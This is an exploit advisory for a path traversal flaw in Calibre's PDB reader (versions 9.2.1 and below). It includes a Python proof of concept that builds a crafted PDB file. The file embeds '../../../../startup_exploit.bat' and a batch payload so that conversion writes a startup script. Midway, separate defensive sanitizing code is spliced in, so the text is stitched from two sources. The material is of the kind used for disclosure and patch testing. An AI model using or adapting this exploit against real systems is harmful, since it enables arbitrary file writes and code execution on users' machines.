=============================================================================================================================================
| # Title : Calibre ≤ 9.2.1 PDB File Path Traversal Vulnerability Leading to Arbitrary File Write |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://manual.calibre-ebook.com/fr/tutorials.html |
=============================================================================================================================================

[+] Summary :

Calibre is a cross-platform e-book management application used for viewing, converting, editing, and organizing digital books.

Versions 9.2.1 and below are vulnerable to a Path Traversal flaw in the PDB file parser, affecting both the 132-byte and 202-byte header variants of the PDB reader implementation.

The vulnerability allows a specially crafted PDB file to embed directory traversal sequences (such as ../) within internal filename fields. When processed by the application, these filenames are not properly sanitized before being written to disk.

[+] As a result, an attacker can:

  Write arbitrary files anywhere the user has write permissions
  Use arbitrary file extensions
  Control the full file content
  Silently overwrite existing files (files are written in wb mode)

[+] Impact :

This issue may lead to:

  Arbitrary File Write
  Local Code Execution (depending on file placement and execution context)
  Denial of Service (DoS) through corruption of critical user files
  Overwriting configuration, startup, or application data files

The vulnerability has been addressed and fixed in version 9.3.0. Users are strongly advised to upgrade to version 9.3.0 or later to mitigate the issue.
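As an added example (not part of this advisory and not Calibre's own code), the guard a PDB-style extractor should apply before writing any record named by the input file, covering both points raised above: the untrusted name field is accepted only as a bare filename whose resolved path is checked against the output directory, and the file is opened with 'xb' rather than 'wb' so existing files are never silently overwritten. Function and class names are illustrative; the traversal name used in demo() is the one from this advisory.

```python
import os
import tempfile

class UnsafeRecordName(ValueError):
    """A record name that would escape the conversion output directory."""

def sanitize_record_name(record_name):
    """Accept only a bare file name from an untrusted PDB record name field."""
    if isinstance(record_name, bytes):
        # Trailing NULs are padding in the fixed-width name field.
        record_name = record_name.rstrip(b'\x00').decode('utf-8', 'replace')
    # Reject separators, drive letters, NULs, '.' and '..' outright instead of rewriting.
    if not record_name or '\x00' in record_name or record_name in ('.', '..'):
        raise UnsafeRecordName(repr(record_name))
    if '/' in record_name or '\\' in record_name or ':' in record_name:
        raise UnsafeRecordName(repr(record_name))
    return record_name

def safe_output_path(base_dir, record_name):
    """Join the sanitized name onto base_dir and verify it still resolves inside."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, sanitize_record_name(record_name)))
    if os.path.commonpath([base, candidate]) != base:  # defence in depth
        raise UnsafeRecordName(repr(record_name))
    return candidate

def write_record(base_dir, record_name, data):
    """Write one extracted record; 'xb' refuses to overwrite, unlike 'wb'."""
    path = safe_output_path(base_dir, record_name)
    with open(path, 'xb') as f:
        f.write(data)
    return path

def demo():
    """Run the guard against the advisory's traversal name and a benign name."""
    results = {}
    with tempfile.TemporaryDirectory() as out_dir:
        try:
            write_record(out_dir, b'../../../../startup_exploit.bat', b'x')
            results['traversal_rejected'] = False
        except UnsafeRecordName:
            results['traversal_rejected'] = True
        path = write_record(out_dir, b'cover.png'.ljust(32, b'\x00'), b'\x89PNG')
        results['written_inside'] = os.path.dirname(path) == os.path.realpath(out_dir)
        try:
            write_record(out_dir, b'cover.png', b'again')
            results['overwrite_refused'] = False
        except FileExistsError:
            results['overwrite_refused'] = True
    return results
```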
[+] POC :

import struct
import os

def generate_exploit_pdb(filename="exploit.pdb"):
    payload_code = b'@echo off\r\ncalc.exe\r\n'
    traversal_path = b'../../../../startup_exploit.bat'

    # Record carrying the traversal sequence in its 32-byte name field
    image_record = bytearray()
    image_record += b'\x00' * 4
    image_record += traversal_path.ljust(32, b'\x00')
    image_record += b'\x00' * 26
    image_record += payload_code

    # 132-byte header variant
    header = bytearray(132)
    struct.pack_into('>H', header, 0, 2)
    struct.pack_into('>H', header, 12, 2)
    struct.pack_into('>H', header, 20, 1)

    dummy_text = b'Hello World'  # Dummy text record

    with open(filename, 'wb') as f:
        f.write(b'Exploit Book'.ljust(32, b'\x00'))
        f.write(b'\x00' * 46)  # Padding to reach the records area
        f.write(header)
        f.write(dummy_text)
        f.write(image_record)

    print(f"[+] Exploit file created successfully: {filename}")
    print(f"[*] Target path upon conversion: {traversal_path.decode()}")

if __name__ == "__main__":
    generate_exploit_pdb()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================